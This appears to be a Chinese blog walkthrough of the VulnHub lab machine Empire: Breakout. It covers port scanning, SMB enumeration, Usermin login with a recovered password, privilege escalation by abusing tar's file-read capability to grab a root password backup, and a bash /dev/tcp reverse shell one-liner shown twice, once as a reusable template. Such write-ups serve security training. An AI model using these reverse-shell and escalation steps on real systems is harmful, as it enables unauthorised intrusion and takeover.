靶机地址
Empire: Breakout ~ VulnHub
打靶过程
信息收集:
目标ip:
192.168.6.10
在目标ip未知的情况下可用arp-scan命令发现主机
arp-scan -l
扫描目标开放端口
nmap -sS -Pn -sV 192.168.6.10
扫描得到
开放端口和服务
| 端口号 | 状态 | 服务名称 | 版本信息 | 说明 |
| 80/tcp | open | http | Apache httpd 2.4.51 ((Debian)) | 目标主机运行了 Apache HTTP 服务,可能是 Web 应用或默认页面。 |
| 139/tcp | open | netbios-ssn | Samba smbd 4.6.2 | Samba 服务,用于文件和打印共享,可能存储敏感数据或存在漏洞。 |
| 445/tcp | open | netbios-ssn | Samba smbd 4.6.2 | 同样是 Samba 服务,监听 445 端口。可通过 SMB 协议进行交互。 |
| 10000/tcp | open | http | MiniServ 1.981 (Webmin httpd) | Webmin 服务,可能是远程管理工具的 Web 界面,存在被暴力破解或利用的风险。 |
| 20000/tcp | open | http | MiniServ 1.830 (Webmin httpd) | 另一 Webmin 服务实例,可能有不同的配置或用途。 |
访问192.168.6.9:80
Apache默认界面
查看源码
发现有Brainfuck加密
解密得到
访问192.168.6.10:10000
提示不安全
https访问
Webmin登录页面
访问192.168.6.10:20000
Usermin登录页面
139和445端口表明主机开启了SMB服务,使用enum4linux对SMB进行枚举检测
enum4linux 192.168.6.10
扫描得到一个本地用户
cyber
尝试利用
user:cyber
password:.2uqPEfj3D<P'a-3
登录俩个登录页面
成功登录usermin
左下角发现shell
进入
得到第一个flag
发现有敏感文件tar
查看文件权限
getcap命令查看tar文件是否具备特殊权限
(getcap 是一个 Linux 工具,用于查看文件是否具有特定的 Capability(特殊权限)。这些特殊权限允许特定程序在没有完整 root 权限的情况下执行特定的高权限操作。)
getcap tar
即tar文件具有可执行权,并且具有跨目录读取任意文件的特殊权限
因此可以利用tar文件对重要信息文件进行打包再解压处理,从而实现绕过文件权限限制。
寻找主机上有没有备份文件或与密码相关的文件
find / -name '*pass*'
find / -name '*.bak*'
找到一个备份文件
直接访问,权限不足
利用tar文件,将.old_pass.bak文件压缩为一个文件包
./tar -cvf 1.tar /var/backups/.old_pass.bak
解压1.tar文件包,实现权限绕过
拿到root密码
尝试登录
登陆失败
反弹shell
kali监听:
nc -lvp 6666
靶机输入:
bash -i >& /dev/tcp/192.168.6.5/6666 0>&1
提权成功
查看根目录
查看root目录
得到第二个flag
命令和工具的使用
arp-scan
Nmap
enum4linux
getcap
getcap命令查看tar文件是否具备特殊权限
(getcap 是一个 Linux 工具,用于查看文件是否具有特定的 Capability(特殊权限)。这些特殊权限允许特定程序在没有完整 root 权限的情况下执行特定的高权限操作。)
tar
压缩
解压
反弹shell
bash -i >& /dev/tcp/<address>/<端口> 0>&1
一个常用的反弹 shell 命令。常用于把内网的机器反弹到外网机器上,从而实现外网主机控制内网主机。
在内网环境也可以用。
这个命令的功能简单来说就是将输入输出重定向到指定的位置,达到反弹 shell 的结果。
brainfuck在线编码
Brainfuck/Ook! Obfuscation/Encoding [splitbrain.org]
标签:文件,tcp,tar,192.168,getcap,Breakout,vulnhub,Empire,权限 From: https://blog.csdn.net/Ra1n3/article/details/144128179